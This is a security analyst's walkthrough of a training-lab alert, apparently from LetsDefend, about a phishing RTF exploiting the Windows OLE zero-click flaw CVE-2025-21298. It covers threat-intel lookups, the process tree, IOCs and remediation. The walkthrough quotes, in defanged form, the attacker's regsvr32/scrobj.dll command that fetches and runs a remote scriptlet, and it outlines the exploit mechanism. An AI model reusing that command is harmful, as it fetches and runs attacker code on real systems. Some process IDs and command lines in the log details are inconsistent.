abc1230940/SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298) Walkthrough

🔎 Table of Content

1. Situation
2. Alert Overview
3. Tools Used
4. Analysis
• Email Security
• Log Management
• Proxy Log
• Endpoint Security
• Terminal History
• Network Action
• Processes
• CVE-2025-21298
5. Playbook
6. Analyst Note
7. Reference

(Back to Top)

Situation

One of our employees Austin received a phishing email from a suspicious sender and an alert was triggered after he opened the email using Outlook At Feb, 04, 2025, 04:18 PM. The trigger reason was "Malicious RTF attachment identified with known CVE-2025-21298 exploit pattern" .

(Back to Top)

Alert Overview

EventID : 314

Event Time : Feb, 04, 2025, 04:18 PM (I think it was wrong)

Rule : SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)

Level : Security Analyst

SMTP Address : 84.38.130.118

Source Address : projectmanagement@pm.me

Destination Address : Austin@letsdefend.io

E-mail Subject : Important: Action Required for Upcoming Project Deadline

Attachment : mail.rtf

Attachment Hash : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

Device Action : Allowed

Trigger Reason : Malicious RTF attachment identified with known CVE-2025-21298 exploit pattern.

(Back to Top)

Tools Used

1. VirusTotal
2. AbuseIPDB
3. Gemini

(Back to Top)

Analysis

Let's dig into the Email Security, Log Management and Endpoint Security Log for the alert triage.

Email Security

I searched the sender address projectmanagement@pm[.]me and clicked the email "Important: Action Required for Upcoming Project Deadline" sent at 05:12 AM on the same day, which was weird to me because the urgent tones and wordings like "Important" and "Action Required" gave me an insight of a phishing email.

I searched the domain pm[.]me on VirusTotal and only 1 vendor decided it as suspcious.

However, when I searched the SMTP Address 84[.]38[.]130[.]118, 7 vendors flagged it as Malicious and Malware and it was related to SILVER C2 server.

84[.]38[.]130[.]118 was also found in AbuseIPDB database. It locates at Riga, Riga, Latvia, belongs to the domain name rixhost.lv and categorized as DDoS Attack, Hacking and Exploited Host.

Finally I searched the hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 of the attachment mail.rtf on VirusTotal and 29 out of 61 vendors flagged the attachment as Malicious. It belongs to the malware family rtfmalformb and it was associated with the vulnerability CVE-2025-21298.

It was confirmed that a phishing email with a malicious attachment was sent to Austin.

(Back to Top)

Log Management

Let's investigate if there were suspicious activities after 05:12 AM when Austin opened the phishing email.

Proxy Log

I first checked the proxy log and searched the malicious IP address of the sender 84[.]38[.]130[.]118, discovering that at 08:06 AM there was a HTTP GET Request to the malcious IP Address with an URL hxxp://84[.]38[.]130[.]118/shell[.]sct initiated by cmd.exe, downloading a Windows scriptlet file. The Response code was 200 OK, indicating that the outbound traffic was allowed and not blocked by the firewall. it was unusual to get a script file which possibly contained reverse shell script.

(Back to Top)

Endpoint Security

Terminal History

Since the outbound traffic to the malicious IP Address was initiated by cmd.exe, I first checked the terminal history and found that at 08:06:08 AM a command "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" was executed to spawn regsvr32.exe to fetch the script file from the malicious IP address by scrobj.dll

• regsvr32.exe: a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry
• /s: regsvr32.exe ran in the background and silently
• /u: forced windows not to add this key to Windows Registry
• /i: interface
• scrobj.dll: Script Object Runtime Library handling scriptlet file

Using the built-in utilities in Windows to fetch the script can leave minimal traces on the system, making reverse engineering and malware analysis process more difficult!

(Back to Top)

Network Action

It was confirmed that there was a connection to the malicious IP 84[.]38[.]130[.]118 at 08:06:42 AM, after the event of execution of command.

(Back to Top)

Processes

So why cmd.exe was executed by just clicking an email? While any evidence of downloading the malicious attachment of mail.rtf by Austin was not found, I checked the endpoint logs and searched any event around 08:06 AM.

Process ID: 7023

Event time: Feb 04 2025 08:06:25

Commandline: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Parent Process: cmd.exe

OK then Let's see the parent proccess cmd.exe

Process ID: 6784

Event time: Feb 04 2025 08:06:08

Commandline: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

Parent Process: outlook.exe

And finally checked the parent process of outlook.exe

Process ID: 4820

Event time: Feb 04 2025 08:05:15

Commandline: "C:\Windows\System32\cmd.exe"

Parent Process: explorer.exe

So we can conclude the the malicious processes in a tree:

explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! Execution of Script !

However I was still questioned by how malicious processes were initiated without downloading and opening the malicious attachment, and how outlook.exe spawned the malicious process until I found the information about CVE-2025-21298.

(Back to Top)

CVE-2025-21298

According to the article from Offsec, there was a critical Windows OLE zero-click vulnerability enabling RCE via email with a CVSS score of 9.8 in January 2025. When the targeted recipient just opens or previews the malicious email in Microsoft Outlook containing a harmful RTF document with an embedded script , the vulnerability is triggered, allowing the attacker to execute arbitrary code on the affected system.

I did some research about Windows OLE and the hijacking processes of RTF document on Google and Gemini and related to my some knowledge of reverse engineering:

1. When opening or previewing the RTF document, UtOlePresStmToContentsStm function inside ole32.dll an OLE object pointed by pstmContents to read the thumbnail image data (OlePres) and dump it into actual data file (CONTENT).
2. The function immediately triggers an unexpected processing error due to the corrupted format of the attacker's RTF file, causing deletion of OLE object but not pstmContents pointer.
3. Malicious RTF file made a malicious OLE object containing the malicious code exactly same size as the deleted OLE object, filling the same memory space still pointed by pstmContents pointer.
4. After the Outlook finished previewing, it runs the fake "clean-up" process containing malicious code "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" inside the malicious fake OLE object.
5. The victim's system executes the remote payload and establishes a reverse shell automatically without any clicks.

(Back to Top)

Playbook

Not Qurantined

Malicious

Accessed

(Back to Top)

Analyst Note

Classification: Critical

Type: Malware

Time of Activity:

Feb, 04, 2025, 05:12 AM (Phishing email received)

Feb, 04, 2025, 08:05:15 AM - Feb, 04, 2025, 08:06:42 AM (Phishing email opened and malicious code executed)

Affected Entities:

Source Address: projectmanagement@pm[.]me

SMTP Address: 84[.]38[.]130[.]118

Recipient Email Address: Austin@letsdefend[.]io

Recipient Ip Address: 172[.]16[.]17[.]137

Hostname: Austin

Reasons for True positive:

At Feb, 04, 2025, 05:12 AM a suspicious email subject "Important: Action Required for Upcoming Project Deadline" was sent from projectmanagement@pm.me (IP Address: 84.38.130.118) to austin@letsdefend.io (IP Address: 172.16.17.137) with an attachment mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). The urgency tones and wordings used in the subject gave an insight of a phishing email. The Threat Intel VirusTotal and AbuseIPDB flagged the IP Address of the sender, located at Riga, Riga, Latvia and belongs to the domain name rixhost.lv and the attachment as malicious and malware.

According to the proxy logs, at 08:06 AM there was a HTTP GET Request to the malicious IP Address with an URL hxxp://84[.]38[.]130[.]118/shell[.]sct initiated by cmd.exe, downloading a Windows scriptlet file. The Response code was 200 OK, indicating that the outbound traffic to the malicious IP address was allowed and not blocked by the firewall.

According to the Endpoint Security logs, the malicious code "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) was initiated by cmd.exe (PID: 6784) spawned from outlook.exe (PID: 4820)

The exploitation was caused by a critical Windows OLE zero-click vulnerability (CVE-2025-21298) enabling RCE via email with a CVSS score of 9.8 in January 2025. When the targeted recipient just opens or previews the malicious email in Microsoft Outlook containing a harmful RTF document with an embedded script, the vulnerability is triggered, allowing the attacker to execute arbitrary code on the affected system, potentially establishing a reverse shell to the C2 server.

Reasons for escalation:

While active post-exploitation C2 network traffic has not yet been definitively observed, endpoint security logs confirmed the execution of regsvr32.exe using scrobj.dll to fetch the scriptlet file shell.sct. Due to the CVSS score of 9.8 of the CVE-2025-21298, further investigation is required to check if there is any suspicious activity on the host like persistence or data exfiltration.

Remediations:

• Disconnect immediately the host Austin from the corporate internal network
• Terminate the process of "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" and its related processes cmd.exe, outlook.exe
• Block the outbound traffic to 84[.]38[.]130[.]118
• Blacklist the domain rixhost[.]lv
• Blacklist the sender projectmanagement@pm[.]me in the email server
• Patch the vulnerability CVE-2025-21298
• Reset the credentials of Austin
• Perform Memory Analysis on the host Austin to investigate the malicious activities like C2 connection, persistence, data exfiltration after an execution of shell.sct
• Perform reverse engineering on shell.sct
• perform email analysis to investigate the originating IP, return address in the email header
• Block the internet access initiated by regsvr32.exe
• Conduct phishing awareness campaign to educate employees not to open an email from unknown senders or with urgent tone or wordings

Indicators of Compromise:

• Sender address: projectmanagement@pm[.]me
Sender IP Address: 84[.]38[.]130[.]118 Sender Domain: rixhost[.]lv
• Phishing Email: "Important: Action Required for Upcoming Project Deadline"
Malicious document: mail.rtf (SHA256 hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
• Malicious process tree: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023)
• URL to second payload: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

(Back to Top)

Reference

CVE-2025-21298 Detail

CVE-2025-21298: A Critical Windows OLE Zero-Click Vulnerability

(Back to Top)